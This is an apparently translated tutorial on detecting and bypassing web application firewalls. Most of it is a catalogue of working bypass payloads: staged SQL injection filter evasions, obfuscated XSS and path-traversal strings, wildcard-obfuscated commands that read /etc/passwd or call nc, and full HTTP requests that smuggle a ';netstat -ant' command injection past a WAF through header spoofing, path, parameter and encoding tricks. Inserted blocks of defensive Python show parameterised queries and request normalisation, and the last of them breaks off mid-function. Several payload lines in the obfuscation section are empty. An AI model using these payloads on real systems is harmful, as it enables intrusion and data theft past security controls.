A Web Application Firewall (WAF) is a security policy enforcement point positioned between a web application and the client endpoint. The function can be implemented in software or hardware, running in an appliance or on an ordinary server with a general-purpose operating system. It can be a standalone device or integrated into another network component. How much do you know about WAFs? Hopefully this article helps!
Based on certain detection characteristics of WAFs, a few small tricks let us identify which WAF is in front of a target.
```text
$ wafw00f -l
WAFW00F - Web Application Firewall Detection Tool
Can test for these WAFs:
aeSecure (aeSecure)
Airlock (Phion/Ergon)
ASP.NET Generic Protection (Microsoft)
Astra Web Protection (Czar Securities)
AWS Elastic Load Balancer (Amazon)
Yunjiasu (Baidu Cloud Computing)
Barikode (Ethic Ninja)
Barracuda Application Firewall (Barracuda Networks)
Bekchy (Faydata Technologies Inc.)
BinarySec (BinarySec)
BitNinja (BitNinja)
BlockDoS (BlockDoS)
Bluedon (Bluedon IST)
CacheWall (Varnish)
CdnNS Application Gateway (CdnNs/WdidcNet)
WP Cerber Security (Cerber Tech)
ChinaCache CDN Load Balancer (ChinaCache)
Chuang Yu Shield (Yunaq)
ACE XML Gateway (Cisco)
Cloudbric (Penta Security)
Greywizard (Grey Wizard)
HyperGuard (Art of Defense)
.....
```
```text
$ python identYwaf.py
identYwaf (1.0.XX)
Usage: python identYwaf.py [options]
```
During WAF testing, the following request was blocked by the WAF:

```http
GET /get/index.jsp?id=payload HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```
#### 2. Choose a fuzzing dictionary

#### 3. Write the script

```python
def fuzzing(payload):
    """Insert every character of the dictionary at every position of the
    payload and return all the variants produced."""
    payloads = []
    # special_chars: pick a suitable dictionary in step 2
    special_chars = ['\r', '\n', '\t', '_', '~', '&', '-', '=', '/', '*',
                     '^', '$', ',', '.', '/', '<', '>', '|', '/**/', '--',
                     '\r\n', '||']
    for char in special_chars:
        for k in range(len(payload)):
            try:
                temp_payload = payload[:k] + char + payload[k:]
                payloads.append(temp_payload)
            except Exception as e:
                print(e)
    return payloads
```
#### • Step 1:
Filtered keywords: and, or, union
Possible regex: preg_match('/(and|or|union)/i', $id)
- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id = 1) = 'admin'

#### • Step 2:
Filtered keywords: and, or, union, where
- Blocked: 1 || (select user from users where user_id = 1) = 'admin'
- Bypass: 1 || (select user from users limit 1) = 'admin'

#### • Step 3:
Filtered keywords: and, or, union, where, limit
- Blocked: 1 || (select user from users limit 1) = 'admin'
- Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

#### • Step 4:
Filtered keywords: and, or, union, where, limit, group by, select
- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

#### • Step 5:
Filtered keywords: and, or, union, where, limit, group by, select
- Blocked: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || 1 = 1 into outfile 'result.txt'
- Bypass: 1 || substr(user,1,1) = 'a'

#### • Step 6:
Filtered keywords: and, or, union, where, limit, group by, select, '
- Blocked: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) = 0x61
- Bypass: 1 || substr(user,1,1) = unhex(61)

#### • Step 7:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex
- Blocked: 1 || substr(user,1,1) = unhex(61)
- Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))

#### • Step 8:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36))
- Bypass: 1 || lpad(user,7,1)

#### • Step 9:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space
- Blocked: 1 || lpad(user,7,1)
- Bypass: 1%0b||%0blpad(user,7,1)
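As an added defender's-eye example (not code from the original article), the following Python contrasts the keyword blacklist the page attributes to the filter, preg_match('/(and|or|union)/i', $id), with positive validation plus a parameterised query; the in-memory users table and its rows are constructed here.

```python
import re
import sqlite3
from typing import Optional

# The blacklist the page's regex implements: it knows three words and never
# matches the page's later payloads (lpad(), "is not null", 0x61, ...).
KEYWORD_FILTER = re.compile(r"(and|or|union)", re.I)


def keyword_filter_blocks(value: str) -> bool:
    """True when the page's blacklist would block this id value."""
    return bool(KEYWORD_FILTER.search(value))


def validate_id(value: str) -> Optional[int]:
    """Positive validation: an id is a short decimal integer and nothing else.
    Every obfuscated variant listed on the page fails this, however it is spelled."""
    if re.fullmatch(r"\d{1,18}", value):
        return int(value)
    return None


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table using the page's column names."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "constructed-hash-1"), (2, "bob", "constructed-hash-2")],
    )
    return conn


def lookup_user(conn: sqlite3.Connection, raw_id: str):
    """Reject anything that is not an integer, then bind it as a parameter so
    the value can never become part of the SQL grammar."""
    uid = validate_id(raw_id)
    if uid is None:
        return None
    return conn.execute("SELECT user FROM users WHERE user_id = ?", (uid,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for probe in ["1", "1 || lpad(user,7,1)", "union select user, password from users"]:
        print(f"{probe!r}: blacklist blocks={keyword_filter_blocks(probe)} "
              f"lookup={lookup_user(db, probe)}")
```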
### Trick three: Obfuscation

```text
Standard:
Bypassed:
Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
Blocked:
Standard:
Standard: ">
Encoded: "> (general form)
Encoded: "> (HTML encoded)
Obfuscated:
tt p://6 6.000146.0x7.147/">XSS
Blocked:
Bypassed:
Blocked: /?id=1+union+select+1,2,3--
Bypassed: /?id=1+un/**/ion+sel/**/ect+1,2,3--
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
Standard: <script>alert()</script>
Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E
Standard: /bin/cat /etc/passwd
Obfuscated: /???/??t /???/??ss??
Used chars: / ? t s
Standard: /bin/nc 127.0.0.1 1337
Obfuscated: /???/n? 2130706433 1337
Used chars: / ? n [0-9]
Standard:
Obfuscated:
Standard: /bin/cat /etc/passwd
Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd
Standard:
Obfuscated:
```

- Case: Unknown Token for the Tokenizer
- Payload: ?id='-sqlite_version() UNION SELECT password FROM users --
- Case: Unknown Context for the Parser (notice the uncontexted bracket)
- Payload 1: ?id=123);DROP TABLE users --
- Payload 2: ?id=1337) INTO OUTFILE 'xxx' --
https://github.com/codewatchorg/bypasswaf
The X-Originating-IP, X-Forwarded-For, X-Remote-IP and X-Remote-Addr headers sent with every request can be modified. This is probably the most effective bypass technique in the toolkit. It is common for a WAF to be configured to trust itself (127.0.0.1) or an upstream proxy device, and that trust is what this bypass targets.

Original request | After the plugin's change |
---|---|
X-Originating-IP: original IP | X-Originating-IP: 127.0.0.1 |
X-Forwarded-For: original IP | X-Forwarded-For: 127.0.0.1 |
X-Remote-IP: original IP | X-Remote-IP: 127.0.0.1 |
X-Remote-Addr: original IP | X-Remote-Addr: 127.0.0.1 |

Case (X-Originating-IP changed to 127.0.0.1):

```http
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For:127.0.0.2
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```
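As an added example on the defender's side (not from the original article or the bypasswaf plugin), this Python derives the client address only from a trusted-proxy chain and flags the header spoofing shown above; the trusted networks, the peer address 203.0.113.7 and the header list are constructed from the page's request.

```python
import ipaddress
from typing import List, Tuple

# Assumption: the WAF's TCP peers are either itself (loopback) or reverse proxies
# in the 10.100.12.0/24 network that the page's Host header points at.
TRUSTED_PROXIES = [ipaddress.ip_network("127.0.0.0/8"),
                   ipaddress.ip_network("10.100.12.0/24")]

# Headers the page's plugin rewrites, plus X-Client-IP which its request also sets.
CLIENT_IP_HEADERS = {"x-originating-ip", "x-forwarded-for", "x-remote-ip",
                     "x-remote-addr", "x-client-ip"}

Headers = List[Tuple[str, str]]  # ordered, duplicate names preserved


def is_trusted(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, headers: Headers) -> str:
    """Address to use for allow-lists and rate limits. Only X-Forwarded-For is
    consulted, only when the TCP peer is a trusted proxy, and it is walked from
    the right so that hops the client itself prepended are never chosen."""
    if not is_trusted(remote_addr):
        return remote_addr  # direct client: every IP header is attacker-controlled
    hops = []
    for name, value in headers:
        if name.lower() == "x-forwarded-for":
            hops.extend(v.strip() for v in value.split(","))
    for hop in reversed(hops):
        if not is_trusted(hop):
            return hop
    return remote_addr


def spoof_findings(remote_addr: str, headers: Headers) -> List[str]:
    """Detection: a direct client claiming a trusted/loopback origin in any
    client-IP header, or sending the same header twice, as in the page's request."""
    findings: List[str] = []
    if is_trusted(remote_addr):
        return findings
    seen = set()
    for name, value in headers:
        key = name.lower()
        if key not in CLIENT_IP_HEADERS:
            continue
        if key in seen:
            findings.append(f"duplicate {name} header")
        seen.add(key)
        for hop in value.split(","):
            if is_trusted(hop):
                findings.append(f"{name} claims trusted address {hop.strip()}")
    return findings


# Constructed from the page's request; 203.0.113.7 is a documentation address.
PAGE_HEADERS: Headers = [
    ("X-Originating-IP", "127.0.0.1"),
    ("X-Forwarded-For", "127.0.0.1"),
    ("X-Remote-IP", "127.0.0.1"),
    ("X-Remote-Addr", "127.0.0.1"),
    ("X-Client-IP", "127.0.0.1"),
    ("User-Agent", "Mozilla/5.0"),
    ("X-Forwarded-For", "127.0.0.2"),
]

if __name__ == "__main__":
    print(client_ip("203.0.113.7", PAGE_HEADERS))
    for finding in spoof_findings("203.0.113.7", PAGE_HEADERS):
        print(finding)
```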
The Content-Type header can be kept unchanged in every request, removed from every request, or changed to one of many other values on each request. Some WAFs only decode/evaluate a request when its content type is one they know, and this feature targets that weakness.

Original request | Result |
---|---|
Content-Type: original | Content-Type: original |
Content-Type: original | Content-Type removed |
Content-Type: original | Content-Type: invalid |
Content-Type: original | Content-Type: example |
Content-Type: original | Content-Type: multipart/ |
Content-Type: original | Content-Type: multipart/digest |
Content-Type: original | Content-Type: multipart/digest; boundary=0000 |
Content-Type: original | Content-Type: multipart/; boundary=0000 |

Case:

```http
POST /post_key/main.jsp HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://10.100.12.249:8080/post_key/
Content-Length: 30
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Type: multipart/; boundary=0000

name=%3Bnetstat+-ant+&pass=1
```
The Host header can also be modified. A poorly configured WAF may evaluate a request only when this header carries the correct FQDN of the host, and that is what this bypass targets.

Case:

```http
POST /post_key/main.jsp HTTP/1.1
Host: (changed here)
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://10.100.12.249:8080/post_key/
Content-Length: 30
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Type: multipart/; boundary=0000

name=%3Bnetstat+-ant+&pass=1
```
The path injection feature can leave the request unmodified, inject random path info (/path/to/example.php/randomvalue?restofquery), or inject a random path parameter (/path/to/example.php;randomparam=randomvalue?restofquery). This can bypass poorly written rules that depend on the path information.

Original request:

```http
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

Path info injection:

```http
GET /get//fhwa84a04vq8a0jnefo?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

Path parameter injection:

```http
GET /get/;mhz=cpv?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```
The path obfuscation feature changes the last forward slash in the path to a random value, or by default does nothing. The last slash can be replaced by one of many values; in many cases the request stays valid but bypasses poorly written WAF rules that depend on the path information.

Original request:

```http
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_//

```http
GET /get///?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_/./

```http
GET /get/././?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_/random/../

```http
GET /get/co7t/../co7t/../?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_\

```http
GET \get\?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_/.//

```http
GET /get/.//.//?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_/./\

```http
GET /get/././\\?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

PathObfuscation_/.\

```http
GET /get/.\.\?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```
ParamObfuscation

Original request:

```http
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

ParamObfuscation_+

```http
GET /get/?+id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

ParamObfuscation_%

```http
GET /get/?%id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

ParamObfuscation_%20

```http
GET /get/?%20id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

ParamObfuscation_%00

```http
GET /get/?%00id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```
Assigning extra values to an existing parameter: HTTP parameter pollution (HPP).

Original attack:

```http
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

HPP.First_test (the value test is assigned to the repeated copies):

```http
GET /get/?id=;netstat%20-ant&id=test&id=test&id=test HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

HPP.Last_test

```http
GET /get/?id=test&id=test&id=test&id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```
Encoding the space

URL encoding

```http
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
```

%u encoding

```http
GET /get/?id=;netstat%u0000-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
```

Double URL encoding

```http
GET /get/?id=;netstat%2500-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
```

Double Double encoding

```http
GET /get/?id=;netstat%25%30%30-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
```

HEX

```http
GET /get/?id=;netstatx00-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
```
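Added here as a defender's example (not code from the original article or the plugin): the WAF-side normalisation that makes the path, parameter-name, HPP and space-encoding variants above, and the double-URL-encoded payloads in the obfuscation section, collapse to one canonical request before a rule is evaluated. The shell-metacharacter rule for the id parameter is an assumption standing in for whatever rule these requests were evading; the sample targets are the page's.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_to_bytes

MAX_DECODE_ROUNDS = 3   # bounds nested decoding: %2500 and %25%30%30 need two rounds
# Assumed rule: an "id" value carrying a shell metacharacter or a NUL is an attack.
SHELL_META = re.compile(r"[;|&`$\x00]")


def percent_decode(text: str) -> str:
    """Decode %XX and the non-standard %uXXXX form repeatedly until stable."""
    for _ in range(MAX_DECODE_ROUNDS):
        step = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
        step = unquote_to_bytes(step).decode("utf-8", "replace")
        if step == text:
            break
        text = step
    return text


def canonical_path(raw_path: str) -> str:
    """Resolve the path the way the backend will: decode, treat backslash as a
    separator, drop ';param=value' path parameters, fold '', '.' and '..'."""
    path = percent_decode(raw_path).replace("\\", "/")
    segments = [s.split(";", 1)[0] for s in path.split("/")]
    out: List[str] = []
    for segment in segments:
        if segment in ("", "."):
            continue
        if segment == "..":
            if out:
                out.pop()
            continue
        out.append(segment)
    canon = "/" + "/".join(out)
    if out and segments[-1] in ("", ".", ".."):
        canon += "/"          # keep the trailing slash the backend would see
    return canon


def parse_query(raw_query: str) -> Dict[str, List[str]]:
    """Keep every value of a repeated name (HPP) and strip the '+', '%', space
    and NUL padding the page prepends to parameter names."""
    params: Dict[str, List[str]] = {}
    for pair in raw_query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name = percent_decode(name.replace("+", " ")).strip(" \x00%")
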